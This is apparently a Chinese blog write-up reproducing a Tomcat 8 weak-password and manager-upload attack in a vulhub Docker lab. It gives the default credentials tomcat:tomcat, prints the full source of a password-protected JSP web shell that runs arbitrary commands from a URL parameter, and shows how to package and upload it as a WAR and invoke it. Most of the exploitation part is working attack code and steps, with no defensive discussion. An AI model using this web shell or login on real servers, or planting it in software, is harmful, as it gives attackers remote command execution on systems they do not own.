Tomcat8 + 弱口令 && 后台getshell 漏洞复现

一:搭建环境

1、利用vulhub搭建环境,进入相关漏洞目录下

cd /vulhub/tomcat/tomcat8

2、一键安装环境

docker-compose up -d

二:漏洞利用

1、打开http://your-ip:8080/manager/html,输入弱密码tomcat:tomcat。
2、制作木马文件,首先准备一个ma.jsp木马,压缩成ma.zip,再修改后缀名为ma.war。
ma.jsp

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>



    
        
        一句话木马
    

    
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("
");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("
"); } %>

3、上传木马文件。
Tomcat8 + 弱口令 && 后台getshell 漏洞复现_第1张图片
Tomcat8 + 弱口令 && 后台getshell 漏洞复现_第2张图片
Tomcat8 + 弱口令 && 后台getshell 漏洞复现_第3张图片
上传成功。
4、访问:http://192.168.33.137:8080/ma/ma.jsp?pwd=admin&cmd=id
Tomcat8 + 弱口令 && 后台getshell 漏洞复现_第4张图片
成功执行cmd命令。

你可能感兴趣的:(漏洞复现,Tomcat8,+,弱口令,&&,后台getshell,漏洞复现)